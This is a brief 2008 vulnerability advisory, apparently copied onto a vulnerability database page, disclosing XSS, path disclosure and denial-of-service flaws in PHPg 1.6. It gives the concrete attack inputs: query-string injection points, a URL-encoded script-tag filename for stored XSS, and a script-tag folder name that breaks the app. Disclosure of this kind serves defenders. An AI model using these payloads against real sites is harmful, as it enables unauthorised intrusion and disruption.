phpg 1.6 - Cross-Site Scripting / Full Path Disclosure / Denial of Service

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1057044 漏洞类型
发布时间 2008-12-21 更新时间 2008-12-21
漏洞平台 PHP CVSS评分 N/A
PHPg 1.6 has a few XSSes, path disclosures, and a DoS vulnerability.
Found by: Anarchy Angel -

Temp XSS:"> [XSS]

Temp XSS: http://site/com/phpg/main-display-file.php?file= [XSS]

Path disclosure: http://site/com/phpg/main-display-file.php?file= [anarchything] .jpg<BR>
As long as the img/vid file does not exist you will get file path.

Static XSS/Path disclosure: Uploading a file with % 3Cscript% 3Ealert% 28% 22Hacked% 20by% 20Anarchy% 20Angel% 22% 29% 3B% 3C% 2Fscript% 3E.jpg as its name "with out the spaces" Will give a path disclosure on the main page and a XSS when you view the file.

DoS: Make a new folder with < script >alert('Hacked by Anarchy Angel') and you will no longer be able to use the app, you can also just rename a folder to do the same thing.

# [2008-12-21]